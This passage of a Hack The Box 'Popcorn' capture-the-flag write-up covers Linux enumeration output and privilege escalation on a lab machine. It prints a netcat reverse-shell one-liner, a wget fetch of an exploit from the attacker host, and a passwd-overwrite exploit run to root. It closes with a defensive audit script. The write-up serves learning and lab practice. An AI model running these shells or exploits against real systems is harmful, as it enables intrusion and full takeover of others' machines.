www-data 1871 0.0 0.6 33908 6728 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 1889 0.0 0.6 33672 6284 ? S 15:46 0:00 /usr/sbin/apache2 -k start
www-data 1890 0.0 0.0 1752 488 ? S 15:57 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 443 >/tmp/f
www-data 1893 0.0 0.0 1704 412 ? S 15:57 0:00 cat /tmp/f
www-data 1894 0.0 0.0 1752 504 ? S 15:57 0:00 sh -i
www-data 1895 0.0 0.0 1724 608 ? S 15:57 0:00 nc 10.10.14.4 443
www-data 1956 0.5 0.1 3348 1692 ? S 16:31 0:00 /bin/bash ./LinEnum.sh
www-data 1957 0.0 0.1 3876 1588 ? R 16:31 0:00 /bin/bash ./LinEnum.sh
www-data 1959 0.0 0.0 1688 444 ? R 16:31 0:00 tee -a
www-data 2187 0.0 0.1 3876 1288 ? R 16:31 0:00 /bin/bash ./LinEnum.sh
www-data 2188 0.0 0.0 2364 920 ? R 16:31 0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 875596 Sep 14 2009 /bin/bash
lrwxrwxrwx 1 root root 4 Mar 17 2017 /bin/sh -> dash
-rwxr-xr-x 1 root root 18360 Oct 23 2009 /sbin/getty
-rwxr-xr-x 1 root root 169676 Oct 15 2009 /sbin/init
lrwxrwxrwx 1 root root 37 Oct 26 2020 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
lrwxrwxrwx 1 root root 34 Mar 17 2017 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 8376232 Nov 10 2010 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 414304 Oct 22 2009 /usr/sbin/sshd
lrwxrwxrwx 1 root root 37 Oct 26 2020 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd


[-] /etc/init.d/ binary permissions:
total 184
drwxr-xr-x 2 root root 4096 Oct 26 2020 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 24 Mar 17 2017 .depend.boot
-rw-r--r-- 1 root root 24 Mar 17 2017 .depend.start
-rw-r--r-- 1 root root 10 Mar 17 2017 .depend.stop
-rw-r--r-- 1 root root 0 Mar 17 2017 .legacy-bootordering
-rw-r--r-- 1 root root 12288 Oct 14 2009 .umountroot.swp
-rw-r--r-- 1 root root 1510 Sep 7 2009 README
-rwxr-xr-x 1 root root 6461 Nov 18 2010 apache2
-rwxr-xr-x 1 root root 3314 Oct 17 2009 apparmor
lrwxrwxrwx 1 root root 21 Mar 17 2017 apport -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 atd -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2341 Sep 7 2009 bootlogd
-rwxr-xr-x 1 root root 1670 Jul 6 2009 console-setup
lrwxrwxrwx 1 root root 21 Mar 17 2017 cron -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 dmesg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1235 Feb 20 2009 dns-clean
-rwxr-xr-x 1 root root 1105 Oct 24 2009 grub-common
-rwxr-xr-x 1 root root 1329 Sep 7 2009 halt
lrwxrwxrwx 1 root root 21 Mar 17 2017 hwclock -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 hwclock-save -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1404 Jul 6 2009 keyboard-setup
-rwxr-xr-x 1 root root 1293 Sep 7 2009 killprocs
lrwxrwxrwx 1 root root 21 Mar 17 2017 module-init-tools -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 5609 Nov 10 2010 mysql
-rwxr-xr-x 1 root root 2070 Sep 15 2009 networking
-rwxr-xr-x 1 root root 882 Sep 7 2009 ondemand
-rwxr-xr-x 1 root root 420 Feb 20 2009 pppd-dns
lrwxrwxrwx 1 root root 21 Mar 17 2017 procps -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 8863 Sep 7 2009 rc
-rwxr-xr-x 1 root root 801 Sep 7 2009 rc.local
-rwxr-xr-x 1 root root 117 Sep 7 2009 rcS
-rwxr-xr-x 1 root root 639 Sep 7 2009 reboot
-rwxr-xr-x 1 root root 4310 Jun 25 2009 rsync
lrwxrwxrwx 1 root root 21 Mar 17 2017 rsyslog -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 rsyslog-kmsg -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 1055 Jul 6 2009 screen-cleanup
-rwxr-xr-x 1 root root 2283 Sep 7 2009 sendsigs
-rwxr-xr-x 1 root root 590 Sep 7 2009 single
-rw-r--r-- 1 root root 4271 Sep 7 2009 skeleton
-rwxr-xr-x 1 root root 3878 Oct 22 2009 ssh
-rwxr-xr-x 1 root root 519 Sep 7 2009 stop-bootlogd
-rwxr-xr-x 1 root root 1095 Sep 7 2009 stop-bootlogd-single
lrwxrwxrwx 1 root root 21 Mar 17 2017 udev -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx 1 root root 21 Mar 17 2017 ufw -> /lib/init/upstart-job
-rwxr-xr-x 1 root root 2746 Oct 14 2009 umountfs
-rwxr-xr-x 1 root root 2075 Oct 14 2009 umountnfs.sh
-rwxr-xr-x 1 root root 1683 Oct 14 2009 umountroot
-rwxr-xr-x 1 root root 1997 Sep 7 2009 urandom
-rwxr-xr-x 1 root root 2327 Sep 20 2009 wpa-ifupdown
-rwxr-xr-x 1 root root 1777 Dec 5 2008 x11-common


[-] /etc/init/ config file permissions:
total 144
drwxr-xr-x 2 root root 4096 Oct 26 2020 .
drwxr-xr-x 87 root root 4096 Jan 2 14:48 ..
-rw-r--r-- 1 root root 1271 Oct 23 2009 apport.conf
-rw-r--r-- 1 root root 261 Sep 15 2009 atd.conf
-rw-r--r-- 1 root root 356 Oct 15 2009 control-alt-delete.conf
-rw-r--r-- 1 root root 297 Sep 15 2009 cron.conf
-rw-r--r-- 1 root root 273 Oct 15 2009 dmesg.conf
-rw-r--r-- 1 root root 312 Sep 10 2009 hostname.conf
-rw-r--r-- 1 root root 444 Oct 23 2009 hwclock-save.conf
-rw-r--r-- 1 root root 557 Oct 23 2009 hwclock.conf
-rw-r--r-- 1 root root 367 Sep 16 2009 module-init-tools.conf
-rw-r--r-- 1 root root 335 Oct 26 2009 mountall-net.conf
-rw-r--r-- 1 root root 261 Oct 26 2009 mountall-reboot.conf
-rw-r--r-- 1 root root 1073 Oct 26 2009 mountall-shell.conf
-rw-r--r-- 1 root root 793 Oct 26 2009 mountall.conf
-rw-r--r-- 1 root root 493 Sep 14 2009 network-interface.conf
-rw-r--r-- 1 root root 290 Sep 15 2009 networking.conf
-rw-r--r-- 1 root root 293 Sep 16 2009 procps.conf
-rw-r--r-- 1 root root 1453 Oct 15 2009 rc-sysinit.conf
-rw-r--r-- 1 root root 354 Oct 15 2009 rc.conf
-rw-r--r-- 1 root root 822 Oct 15 2009 rcS.conf
-rw-r--r-- 1 root root 589 Oct 15 2009 rsyslog-kmsg.conf
-rw-r--r-- 1 root root 280 Oct 15 2009 rsyslog.conf
-rw-r--r-- 1 root root 228 Oct 15 2009 tty1.conf
-rw-r--r-- 1 root root 213 Oct 15 2009 tty2.conf
-rw-r--r-- 1 root root 213 Oct 15 2009 tty3.conf
-rw-r--r-- 1 root root 213 Oct 15 2009 tty4.conf
-rw-r--r-- 1 root root 213 Oct 15 2009 tty5.conf
-rw-r--r-- 1 root root 213 Oct 15 2009 tty6.conf
-rw-r--r-- 1 root root 769 Sep 22 2009 udev-finish.conf
-rw-r--r-- 1 root root 316 Sep 22 2009 udev.conf
-rw-r--r-- 1 root root 356 Sep 22 2009 udevmonitor.conf
-rw-r--r-- 1 root root 318 Sep 22 2009 udevtrigger.conf
-rw-r--r-- 1 root root 344 Sep 24 2009 ufw.conf
-rw-r--r-- 1 root root 313 Oct 15 2009 upstart-udev-bridge.conf
-r--r--r-- 1 root root 901 Oct 26 2020 vmware-tools.conf


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.7.0


[-] MYSQL version:
mysql Ver 14.14 Distrib 5.1.37, for debian-linux-gnu (i486) using EditLine wrapper


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


[-] Installed compilers:
ii g++ 4:4.4.1-1ubuntu2 The GNU C++ compiler
ii g++-4.4 4.4.1-4ubuntu9 The GNU C++ compiler
ii gcc 4:4.4.1-1ubuntu2 The GNU C compiler
ii gcc-4.4 4.4.1-4ubuntu9 The GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1031 Mar 17 2017 /etc/passwd
-rw-r--r-- 1 root root 691 Mar 17 2017 /etc/group
-rw-r--r-- 1 root root 497 Mar 17 2017 /etc/profile
-rw-r----- 1 root shadow 838 Mar 17 2017 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 30492 May 12 2009 /bin/ping6
-rwsr-xr-x 1 root root 34696 May 12 2009 /bin/ping
-rwsr-xr-x 1 root root 47096 Oct 23 2009 /bin/umount
-rwsr-xr-x 1 root root 72188 Oct 23 2009 /bin/mount
-rwsr-xr-x 1 root root 22064 Mar 5 2009 /bin/fusermount
-rwsr-xr-x 1 root root 31124 Jul 31 2009 /bin/su
-rwsr-xr-x 1 root root 9548 Jan 11 2011 /usr/lib/pt_chown
-r-sr-xr-x 1 root root 9532 Oct 26 2020 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Oct 26 2020 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 5544 Apr 29 2009 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 179120 Oct 22 2009 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40332 Jul 31 2009 /usr/bin/chfn
-rwsr-xr-x 1 root root 30936 Jul 31 2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52036 Nov 5 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 31756 Jul 31 2009 /usr/bin/chsh
-rwsr-xr-x 2 root root 123448 Jun 22 2009 /usr/bin/sudo
-rwsr-xr-x 1 root root 13948 May 12 2009 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 41292 Jul 31 2009 /usr/bin/passwd
-rwsr-xr-x 1 root root 13816 May 12 2009 /usr/bin/arping
-rwsr-xr-x 1 root root 57964 Jul 31 2009 /usr/bin/gpasswd
-rwsr-xr-x 2 root root 123448 Jun 22 2009 /usr/bin/sudoedit
-rwsr-sr-x 1 daemon daemon 46964 Sep 15 2009 /usr/bin/at
-rwsr-xr-- 1 root dip 277352 Feb 20 2009 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 13848 Oct 23 2009 /usr/sbin/uuidd


[-] SGID files:
-rwxr-sr-x 1 root shadow 30400 Sep 4 2009 /sbin/unix_chkpwd
-rwxr-sr-x 1 root mlocate 34408 Apr 29 2009 /usr/bin/mlocate
-rwxr-sr-x 1 root ssh 79912 Oct 22 2009 /usr/bin/ssh-agent
-rwxr-sr-x 1 root crontab 31712 Sep 15 2009 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 57580 Jul 31 2009 /usr/bin/chage
-rwxr-sr-x 3 root mail 9896 Jul 6 2009 /usr/bin/mail-lock
-rwxr-sr-x 3 root mail 9896 Jul 6 2009 /usr/bin/mail-unlock
-rwxr-sr-x 1 root tty 13864 Oct 23 2009 /usr/bin/wall
-rwxr-sr-x 3 root mail 9896 Jul 6 2009 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root tty 9704 May 9 2009 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 14280 Nov 18 2008 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 361080 Jul 6 2009 /usr/bin/screen
-rwxr-sr-x 1 root shadow 18128 Jul 31 2009 /usr/bin/expiry
-rwsr-sr-x 1 daemon daemon 46964 Sep 15 2009 /usr/bin/at
-rwsr-sr-x 1 libuuid libuuid 13848 Oct 23 2009 /usr/sbin/uuidd


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 34 Mar 17 2017 /etc/ld.so.conf
-rw-r--r-- 1 root root 1173 Oct 15 2009 /etc/rsyslog.conf
-rw-r--r-- 1 root root 92 Apr 27 2009 /etc/host.conf
-rw-r--r-- 1 root root 248 Apr 29 2009 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Aug 20 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 4794 Oct 6 2009 /etc/hdparm.conf
-rw-r--r-- 1 root root 2986 Mar 17 2017 /etc/adduser.conf
-rw-r--r-- 1 root root 350 Mar 17 2017 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 600 Aug 3 2009 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Oct 2 2009 /etc/debconf.conf
-rw-r--r-- 1 root root 126 Oct 1 2020 /etc/cvs-pserver.conf
-rw-r--r-- 1 root root 240 Mar 17 2017 /etc/kernel-img.conf
-rw-r--r-- 1 root root 15752 Jul 25 2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 85 Oct 1 2020 /etc/resolv.conf
-rw-r--r-- 1 root root 2277 Sep 16 2009 /etc/sysctl.conf
-rw-r--r-- 1 root root 89 Oct 1 2020 /etc/cvs-cron.conf
-rw-r----- 1 root fuse 216 Mar 5 2009 /etc/fuse.conf
-rw-r--r-- 1 root root 645 May 2 2009 /etc/ts.conf
-rw-r--r-- 1 root root 6332 Mar 17 2017 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 885 Sep 7 2009 /etc/insserv.conf
-rw-r--r-- 1 root root 801 Oct 24 2009 /etc/mke2fs.conf
-rw-r--r-- 1 root root 321 Oct 23 2009 /etc/blkid.conf
-rw-r--r-- 1 root root 552 Sep 4 2009 /etc/pam.conf
-rw-r--r-- 1 root root 475 Aug 28 2006 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2689 Mar 27 2008 /etc/gai.conf


[-] Location and contents (if accessible) of .bash_history file(s):
/home/george/.bash_history


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Mar 17 2017 .
drwxr-xr-x 15 root root 4096 Oct 26 15:16 ..


### SCAN COMPLETE ####################################
$ cat /home/george/.bash_history
$

25. At this point I still had no leads, so I went back to the walkthrough report and found that the answer is still in the user's home directory.

$ 
$ cd /home/george/
$ ls -la
total 860
drwxr-xr-x 3 george george 4096 Oct 26 14:57 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
lrwxrwxrwx 1 george george 9 Oct 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Jan 2 14:48 user.txt
$ cd .cache
$ ls -la
total 8
drwxr-xr-x 2 george george 4096 Mar 17 2017 .
drwxr-xr-x 3 george george 4096 Oct 26 14:57 ..
-rw-r--r-- 1 george george 0 Mar 17 2017 motd.legal-displayed
$ cat motd.legal-displayed
$

26. The key to privilege escalation is this motd.legal-displayed file; search Google and Baidu for related vulnerabilities.

27. The vulnerabilities I found were not quite right, so I had to use the exploit from the walkthrough report:

https://www.exploit-db.com/exploits/40839

28. Then the exploitation and privilege escalation began:

www-data@popcorn:/tmp$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/tmp$ wget http://10.10.14.4/poc.c
wget http://10.10.14.4/poc.c
--2024-01-02 17:04:38-- http://10.10.14.4/poc.c
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4828 (4.7K) [text/x-csrc]
Saving to: `poc.c'

100%[======================================>] 4,828 --.-K/s in 0.001s

2024-01-02 17:04:39 (6.44 MB/s) - `poc.c' saved [4828/4828]

www-data@popcorn:/tmp$ ls
ls
14339.sh LinEnum.sh exp.sh f poc.c vgauthsvclog.txt.0 vmware-root
www-data@popcorn:/tmp$ gcc -pthread poc.c -o poc -lcrypt
gcc -pthread poc.c -o poc -lcrypt
www-data@popcorn:/tmp$ ls -la
ls -la
total 104
drwxrwxrwt 5 root root 4096 Jan 2 17:05 .
drwxr-xr-x 21 root root 4096 Jan 2 14:48 ..
drwxrwxrwt 2 root root 4096 Jan 2 14:48 .ICE-unix
drwxrwxrwt 2 root root 4096 Jan 2 14:48 .X11-unix
lrwxrwxrwx 1 www-data www-data 11 Jan 2 16:52 .cache -> /etc/passwd
-rwxr-xr-x 1 www-data www-data 3042 Jan 2 16:56 14339.sh
-rwxr-xr-x 1 www-data www-data 46631 Jan 7 2020 LinEnum.sh
-rwxr-xr-x 1 www-data www-data 3056 Jan 2 16:40 exp.sh
prw-r--r-- 1 www-data www-data 0 Jan 2 17:05 f
-rwxr-xr-x 1 www-data www-data 13601 Jan 2 17:05 poc
-rw-r--r-- 1 www-data www-data 4828 Jan 2 17:04 poc.c
-rw-r--r-- 1 root root 1600 Jan 2 14:48 vgauthsvclog.txt.0
drwx------ 2 root root 4096 Jan 2 14:48 vmware-root

www-data@popcorn:/tmp$ ./poc
./poc
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root

Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash

mmap: b77f8000
su root
^C

29. Then I obtained a fresh reverse shell, switched to the firefart user, got the new privileges, and read the flag:

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.6] 54733
sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@popcorn:/var/www/torrent/upload$ su firefart
su firefart
Password: root

firefart@popcorn:/var/www/torrent/upload# id
id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@popcorn:/var/www/torrent/upload# cat /root/root.txt
cat /root/root.txt
cfc4eac1c0d5160439ad60aff6784873
firefart@popcorn:/var/www/torrent/upload#
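The PoC transcript above shows what the attack leaves behind: /etc/passwd is backed up to /tmp/passwd.bak and a new UID-0 line (firefart:...:0:0:pwned:/root:/bin/bash) is written into the live file, after which "su root" no longer behaves. The following is an added example for this writeup, not code from the original post or from the exploit-db PoC: a small audit script that takes the backup and the live passwd file and reports rogue UID-0 accounts, entries carrying a password hash directly in /etc/passwd instead of the "x" shadow marker, malformed lines, and the exact lines added or removed. The sample file contents are constructed; the sample assumes root's own line was overwritten, which is an assumption about the PoC rather than something the transcript states.

```python
"""Audit /etc/passwd for a rogue UID-0 account and diff it against a backup.

Added example (not part of the original writeup or the exploit-db PoC).
Sample contents below are constructed so the script runs offline.
"""
import sys
from typing import Dict, List, Tuple

# Constructed sample: a minimal Ubuntu-style passwd file before the attack...
PASSWD_BACKUP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
george:x:1000:1000:George,,,:/home/george:/bin/bash
"""

# ...and after it, with the line reported by the PoC in place of root's entry
# (assumption: whether root's line survives depends on the PoC).
PASSWD_CURRENT = """\
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
george:x:1000:1000:George,,,:/home/george:/bin/bash
"""

# Values in field 2 that mean "no hash stored here" (shadowed or locked account).
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text: str) -> Tuple[List[Dict], List[str]]:
    """Split passwd text into 7-field entries; malformed lines are returned separately."""
    entries: List[Dict] = []
    malformed: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            malformed.append(line)
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "passwd": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell, "raw": line})
    return entries, malformed


def find_rogue_superusers(entries: List[Dict]) -> List[str]:
    """Names of UID-0 accounts other than root: the classic passwd-write backdoor."""
    return [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"]


def find_inline_hashes(entries: List[Dict]) -> List[str]:
    """Names whose password field holds a hash instead of a shadow/lock marker."""
    return [e["name"] for e in entries if e["passwd"] not in SHADOW_MARKERS]


def diff_passwd(backup_text: str, current_text: str) -> Tuple[List[str], List[str]]:
    """Lines present only in the current file (added) and only in the backup (removed)."""
    backup_lines = [l for l in backup_text.splitlines() if l.strip()]
    current_lines = [l for l in current_text.splitlines() if l.strip()]
    backup_set, current_set = set(backup_lines), set(current_lines)
    added = [l for l in current_lines if l not in backup_set]
    removed = [l for l in backup_lines if l not in current_set]
    return added, removed


def audit(backup_text: str, current_text: str) -> Dict[str, List[str]]:
    """Run every check on the current file and return findings keyed by check name."""
    entries, malformed = parse_passwd(current_text)
    added, removed = diff_passwd(backup_text, current_text)
    return {
        "rogue_superusers": find_rogue_superusers(entries),
        "inline_hashes": find_inline_hashes(entries),
        "malformed": malformed,
        "added": added,
        "removed": removed,
    }


if __name__ == "__main__":
    # Usage: python passwd_audit.py [/tmp/passwd.bak /etc/passwd]; defaults to the sample.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f_backup, open(sys.argv[2]) as f_current:
            findings = audit(f_backup.read(), f_current.read())
    else:
        findings = audit(PASSWD_BACKUP, PASSWD_CURRENT)
    for check, hits in findings.items():
        print(f"{check}: {hits if hits else 'none'}")
```

On the sample the script flags firefart twice, once as a non-root UID-0 account and once because its second field is a crypt hash rather than "x", and the diff shows the firefart line added and the root line removed. Without a backup the first two checks still work on the live file alone, which is why they are kept separate from the diff.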

0x03 Completion Proof

https://www.hackthebox.com/achievement/machine/1705469/4


Popcorn-htb-writeup
https://sh1yan.top/2024/01/02/Popcorn-htb-writeup/
Author
shiyan
Published on
January 2, 2024
License